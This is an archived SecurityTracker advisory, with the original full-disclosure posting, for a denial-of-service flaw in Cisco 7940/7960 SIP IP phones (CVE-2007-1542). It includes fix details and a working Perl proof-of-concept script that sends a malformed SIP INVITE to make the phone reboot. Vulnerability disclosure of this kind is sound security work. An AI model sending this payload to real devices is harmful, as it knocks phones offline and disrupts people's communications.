SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (VoIP/Phone/FAX)  >   Cisco IP Phones Vendors:   Cisco
Cisco 7940/7960 IP Phones Can Be Crashed With a SIP INVITE Message
SecurityTracker Alert ID:  1017797
SecurityTracker URL:  http://securitytracker.com/id/1017797
CVE Reference:   CVE-2007-1542   (Links to External Site)
Updated:  Mar 26 2007
Original Entry Date:  Mar 20 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Model 7940/7960, with firmware P0S3-07-4-00
Description:   A vulnerability was reported in the Cisco 7940/7960 IP Phones. A remote user can cause denial of service conditions.

The phone does not properly validate the user-supplied sipURI field in the Remote-Party-ID value of a SIP INVITE message. A remote user can send a specially crafted SIP INVITE message to cause the target device to crash.

Humberto J. Abdelnur, Radu State, and Olivier Festor of the Madynes research team at INRIA Lorraine discovered this vulnerability using the Madynes VoIP fuzzer.

Impact:   A remote user can cause the target phone to crash.
Solution:   The vendor has issued a fixed version (firmware POS8-6-0; 8.6(0)), available at:

http://www.cisco.com/pcgi-bin/tablebuild.pl/sip-ip-phone7960?psrtdcat20e2

The Cisco advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sr-20070320-sip.shtml

Vendor URL:  www.cisco.com/warp/public/707/cisco-sr-20070320-sip.shtml (Links to External Site)
Cause:   Exception handling error, Input validation error

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] CISCO Phone 7940 DOS vulnerability

MADYNES Security Advisory 


http://madynes.loria.fr



Severity: High

Title: Cisco 7940 SIP INVITE remote DOS 

Date: February 19, 2007

ID: KIPH2


Synopsis: After sending a cra fted INVITE message the device immediately
reboots. The phone does not check properly the sipURI field of the
Remote-Party-ID in the message.

The vendor was informed and acknowledged the vulnerability. This
vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.


Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol
for VoIP signalization. SIP is an ASCII based INVITE message is used to
initiate and maintain a communication session. 


Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00


Unaffected: devices running firmware POS8-6-0



Proof of Concept Code: 


#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);



Description: After receiving one crafted SIP INVITE message, the
affected device reboots immediately. The proof of concept code can be
used to demonstrate the vulnerability.



Impact 

A malicious user can remotely crash and perform a denial of service
attack by sending one crafted SIP INVITE message. This is conceptually
similar to the “ping of death”. 


Resolution:

Fixed software is available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will
be protected from malicious traffic in most situations. 







Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA

Lorraine, using the Madynes VoIP fuzzer.

http://madynes.loria.fr/




Information about us: Madynes is a research team at INRIA Lorraine
working on VoIP Security assessment, intrusion detection and prevention.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC